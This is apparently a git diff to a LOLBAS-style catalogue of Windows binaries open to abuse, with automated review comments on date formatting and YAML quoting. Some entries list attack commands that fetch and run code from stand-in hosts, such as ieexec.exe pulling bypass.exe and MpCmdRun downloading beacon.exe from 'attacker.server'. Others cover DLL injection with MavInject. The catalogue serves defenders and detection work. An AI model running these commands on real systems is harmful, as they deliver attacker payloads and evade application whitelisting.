- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
|
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
|
||||||
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
|
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
|
||||||
@ -169,7 +169,7 @@ Full_Path:
|
|||||||
- Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\
|
- Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\
|
||||||
- Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
|
- Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
|
||||||
- Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
|
- Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
|
- IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://www.sothis.tech/author/jgalvez/
|
- Link: https://www.sothis.tech/author/jgalvez/
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Gpscript.exe
|
Name: Gpscript.exe
|
||||||
Description: Used by group policy to process scripts
|
Description: Used by group policy to process scripts
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Gpscript /logon
|
- Command: Gpscript /logon
|
||||||
Description: Executes logon scripts configured in Group Policy.
|
Description: Executes logon scripts configured in Group Policy.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\gpscript.exe
|
- Path: C:\Windows\System32\gpscript.exe
|
||||||
- Path: C:\Windows\SysWOW64\gpscript.exe
|
- Path: C:\Windows\SysWOW64\gpscript.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Scripts added in local group policy
|
- IOC: Scripts added in local group policy
|
||||||
@ -33,4 +33,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Hh.exe
|
Name: Hh.exe
|
||||||
Description: Binary used for processing chm files in Windows
|
Description: Binary used for processing chm files in Windows
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: HH.exe http://some.url/script.ps1
|
- Command: HH.exe http://some.url/script.ps1
|
||||||
Description: Open the target PowerShell script with HTML Help.
|
Description: Open the target PowerShell script with HTML Help.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\hh.exe
|
- Path: C:\Windows\System32\hh.exe
|
||||||
- Path: C:\Windows\SysWOW64\hh.exe
|
- Path: C:\Windows\SysWOW64\hh.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: hh.exe should normally not be in use on a normal workstation
|
- IOC: hh.exe should normally not be in use on a normal workstation
|
||||||
@ -32,4 +32,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Ie4uinit.exe
|
Name: Ie4uinit.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ie4uinit.exe -BaseSettings
|
- Command: ie4uinit.exe -BaseSettings
|
||||||
Description: Executes commands from a specially prepared ie4uinit.inf file.
|
Description: Executes commands from a specially prepared ie4uinit.inf file.
|
||||||
@ -17,7 +17,7 @@ Full_Path:
|
|||||||
- Path: c:\windows\sysWOW64\ie4uinit.exe
|
- Path: c:\windows\sysWOW64\ie4uinit.exe
|
||||||
- Path: c:\windows\system32\ieuinit.inf
|
- Path: c:\windows\system32\ieuinit.inf
|
||||||
- Path: c:\windows\sysWOW64\ieuinit.inf
|
- Path: c:\windows\sysWOW64\ieuinit.inf
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: ie4uinit.exe loading a inf file from outside %windir%
|
- IOC: ie4uinit.exe loading a inf file from outside %windir%
|
||||||
@ -26,4 +26,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Jimmy
|
- Person: Jimmy
|
||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
---
|
---
|
||||||
|
@ -2,9 +2,9 @@
|
|||||||
Name: Ieexec.exe
|
Name: Ieexec.exe
|
||||||
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
|
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||||
Description: Downloads and executes bypass.exe from the remote server.
|
Description: Downloads and executes bypass.exe from the remote server.
|
||||||
Usecase: Download and run attacker code from remote location
|
Usecase: Download and run attacker code from remote location
|
||||||
Category: Download
|
Category: Download
|
||||||
@ -12,7 +12,7 @@ Commands:
|
|||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||||
Description: Downloads and executes bypass.exe from the remote server.
|
Description: Downloads and executes bypass.exe from the remote server.
|
||||||
Usecase: Download and run attacker code from remote location
|
Usecase: Download and run attacker code from remote location
|
||||||
Category: Execute
|
Category: Execute
|
||||||
@ -23,13 +23,13 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Ilasm.exe
|
Name: Ilasm.exe
|
||||||
Description: used for compile c# code into dll or exe.
|
Description: used for compile c# code into dll or exe.
|
||||||
Author: Hai vaknin (lux)
|
Author: Hai vaknin (lux)
|
||||||
Created: 17/03/2020
|
Created: 2020-03-17
|
||||||
Commands:
|
Commands:
|
||||||
- Command: ilasm.exe C:\public\test.txt /exe
|
- Command: ilasm.exe C:\public\test.txt /exe
|
||||||
Description: Binary file used by .NET to compile c# code to .exe
|
Description: Binary file used by .NET to compile c# code to .exe
|
||||||
@ -11,7 +11,7 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1127/
|
MitreLink: https://attack.mitre.org/techniques/T1127/
|
||||||
OperatingSystem: Windows 10,7
|
OperatingSystem: Windows 10,7
|
||||||
- Command: ilasm.exe C:\public\test.txt /dll
|
- Command: ilasm.exe C:\public\test.txt /dll
|
||||||
Description: Binary file used by .NET to compile c# code to dll
|
Description: Binary file used by .NET to compile c# code to dll
|
||||||
Usecase: A description of the usecase
|
Usecase: A description of the usecase
|
||||||
@ -22,7 +22,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
|
- Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
|
||||||
|
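Review bot: `Usecase: A description of the usecase` on the second command is template placeholder text that survives this hunk; it should be replaced with the real use case, e.g. `Usecase: Compile code into a DLL with a built-in .NET binary`, so the entry renders meaningfully. The conversion of `Created: 17/03/2020` to `2020-03-17` in this hunk reads the original as day-first; the later MpCmdRun hunk converts `'09/03/2020'` to `2020-03-20`, which matches neither the day-first (2020-03-09) nor the month-first (2020-09-03) reading and looks like a typo worth confirming with the author.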
@ -2,7 +2,7 @@
|
|||||||
Name: Infdefaultinstall.exe
|
Name: Infdefaultinstall.exe
|
||||||
Description: Binary used to perform installation based on content inside inf files
|
Description: Binary used to perform installation based on content inside inf files
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
|
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
|
||||||
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
|
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Infdefaultinstall.exe
|
- Path: C:\Windows\System32\Infdefaultinstall.exe
|
||||||
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
|
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
@ -25,4 +25,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Kyle Hanslovan
|
- Person: Kyle Hanslovan
|
||||||
Handle: '@kylehanslovan'
|
Handle: '@kylehanslovan'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Installutil.exe
|
Name: Installutil.exe
|
||||||
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
|
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||||
Description: Execute the target .NET DLL or EXE.
|
Description: Execute the target .NET DLL or EXE.
|
||||||
@ -25,7 +25,7 @@ Full_Path:
|
|||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
@ -39,4 +39,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Jsc.exe
|
Name: Jsc.exe
|
||||||
Description: Binary file used by .NET to compile javascript code to .exe or .dll format
|
Description: Binary file used by .NET to compile javascript code to .exe or .dll format
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2019-05-31'
|
Created: 2019-05-31
|
||||||
Commands:
|
Commands:
|
||||||
- Command: jsc.exe scriptfile.js
|
- Command: jsc.exe scriptfile.js
|
||||||
Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
|
Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
|
||||||
@ -25,14 +25,14 @@ Full_Path:
|
|||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Jsc.exe should normally not run a system unless it is used for development.
|
- IOC: Jsc.exe should normally not run a system unless it is used for development.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/DissectMalware/status/998797808907046913
|
- Link: https://twitter.com/DissectMalware/status/998797808907046913
|
||||||
- Link: https://www.phpied.com/make-your-javascript-a-windows-exe/
|
- Link: https://www.phpied.com/make-your-javascript-a-windows-exe/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Malwrologist
|
- Person: Malwrologist
|
||||||
Handle: '@DissectMalware'
|
Handle: '@DissectMalware'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Makecab.exe
|
Name: Makecab.exe
|
||||||
Description: Binary to package existing files into a cabinet (.cab) file
|
Description: Binary to package existing files into a cabinet (.cab) file
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
|
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
|
||||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||||
@ -31,7 +31,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\makecab.exe
|
- Path: C:\Windows\System32\makecab.exe
|
||||||
- Path: C:\Windows\SysWOW64\makecab.exe
|
- Path: C:\Windows\SysWOW64\makecab.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Makecab getting files from Internet
|
- IOC: Makecab getting files from Internet
|
||||||
@ -41,4 +41,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Mavinject.exe
|
Name: Mavinject.exe
|
||||||
Description: Used by App-v in Windows
|
Description: Used by App-v in Windows
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
|
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
|
||||||
Description: Inject evil.dll into a process with PID 3110.
|
Description: Inject evil.dll into a process with PID 3110.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\mavinject.exe
|
- Path: C:\Windows\System32\mavinject.exe
|
||||||
- Path: C:\Windows\SysWOW64\mavinject.exe
|
- Path: C:\Windows\SysWOW64\mavinject.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
||||||
@ -36,4 +36,4 @@ Acknowledgement:
|
|||||||
Handle: '@gN3mes1s'
|
Handle: '@gN3mes1s'
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Microsoft.Workflow.Compiler.exe
|
Name: Microsoft.Workflow.Compiler.exe
|
||||||
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
|
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
|
||||||
Author: 'Conor Richard'
|
Author: 'Conor Richard'
|
||||||
Created: '2018-10-22'
|
Created: 2018-10-22
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
|
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
|
||||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
|
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
|
||||||
@ -19,7 +19,7 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||||
OperatingSystem: Windows 10S
|
OperatingSystem: Windows 10S
|
||||||
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
|
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
|
||||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
|
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
|
||||||
Usecase: Compile and run code
|
Usecase: Compile and run code
|
||||||
@ -27,10 +27,10 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||||
OperatingSystem: Windows 10S
|
OperatingSystem: Windows 10S
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
|
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
|
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
|
||||||
@ -53,4 +53,4 @@ Acknowledgement:
|
|||||||
Handle: '@FortyNorthSec'
|
Handle: '@FortyNorthSec'
|
||||||
- Person: Bank Security
|
- Person: Bank Security
|
||||||
Handle: '@Bank_Security'
|
Handle: '@Bank_Security'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Mmc.exe
|
Name: Mmc.exe
|
||||||
Description: Load snap-ins to locally and remotely manage Windows systems
|
Description: Load snap-ins to locally and remotely manage Windows systems
|
||||||
Author: '@bohops'
|
Author: '@bohops'
|
||||||
Created: '2018-12-04'
|
Created: 2018-12-04
|
||||||
Commands:
|
Commands:
|
||||||
- Command: mmc.exe -Embedding c:\path\to\test.msc
|
- Command: mmc.exe -Embedding c:\path\to\test.msc
|
||||||
Description: Launch a 'backgrounded' MMC process and invoke a COM payload
|
Description: Launch a 'backgrounded' MMC process and invoke a COM payload
|
||||||
@ -15,10 +15,10 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\mmc.exe
|
- Path: C:\Windows\System32\mmc.exe
|
||||||
- Path: C:\Windows\SysWOW64\mmc.exe
|
- Path: C:\Windows\SysWOW64\mmc.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
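Review bot: Dropping the quotes on `Created: 2018-12-04` changes the value's type, not only its style: a YAML 1.1 loader such as PyYAML resolves an unquoted ISO date to a `datetime.date`, so a consumer that treats `Created` as a string (string formatting, JSON serialisation) may fail where the quoted form worked. The same unquoting is made in the MpCmdRun, Msbuild, Msconfig, Msdt, Mshta, Msiexec, Netsh, Odbcconf, Pcalua, Pcwrun, Pktmon, Presentationhost, Print, Psr, Rasautou, Reg, Regasm and Regedit sections, while the three files added by this commit (OfflineScannerShell, OneDriveStandaloneUpdater, PrintBrm) keep `Created: '…'` quoted, so the repository ends up with both forms. If the site tooling is known to want date objects, apply the change to the new files as well; otherwise keep the string form, `Created: '2018-12-04'`, which is what every unchanged file uses.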
|
@ -2,7 +2,7 @@
|
|||||||
Name: MpCmdRun.exe
|
Name: MpCmdRun.exe
|
||||||
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
|
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '09/03/2020'
|
Created: 2020-03-20
|
||||||
Commands:
|
Commands:
|
||||||
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
|
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
|
||||||
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
|
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
|
||||||
@ -32,9 +32,9 @@ Full_Path:
|
|||||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
|
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
|
||||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
|
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
|
||||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
|
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: MpCmdRun storing data into alternate data streams.
|
- IOC: MpCmdRun storing data into alternate data streams.
|
||||||
- IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
|
- IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
|
||||||
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
|
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
|
||||||
@ -54,4 +54,4 @@ Acknowledgement:
|
|||||||
Handle: ''
|
Handle: ''
|
||||||
- Person: Cedric
|
- Person: Cedric
|
||||||
Handle: '@th3c3dr1c'
|
Handle: '@th3c3dr1c'
|
||||||
---
|
---
|
||||||
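Review bot: The rewritten `Created: 2020-03-20` does not correspond to the original `'09/03/2020'`: read as day/month it is 2020-03-09 and as month/day it is 2020-09-03, but neither reading yields the 20th, so the day looks mistyped during the format conversion. Please confirm the intended date with the author before merging, since this is the only content change in the section. The `Handle: ''` further down is the explicit empty-string spelling that the other files touched here should also use for an unknown handle.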
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Msbuild.exe
|
Name: Msbuild.exe
|
||||||
Description: Used to compile and execute code
|
Description: Used to compile and execute code
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: msbuild.exe pshell.xml
|
- Command: msbuild.exe pshell.xml
|
||||||
Description: Build and execute a C# project stored in the target XML file.
|
Description: Build and execute a C# project stored in the target XML file.
|
||||||
@ -37,7 +37,7 @@ Full_Path:
|
|||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
||||||
- Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
|
- Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Msbuild.exe should not normally be executed on workstations
|
- IOC: Msbuild.exe should not normally be executed on workstations
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Msconfig.exe
|
Name: Msconfig.exe
|
||||||
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
|
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Msconfig.exe -5
|
- Command: Msconfig.exe -5
|
||||||
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
|
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
|
||||||
@ -14,7 +14,7 @@ Commands:
|
|||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\msconfig.exe
|
- Path: C:\Windows\System32\msconfig.exe
|
||||||
Code_Sample:
|
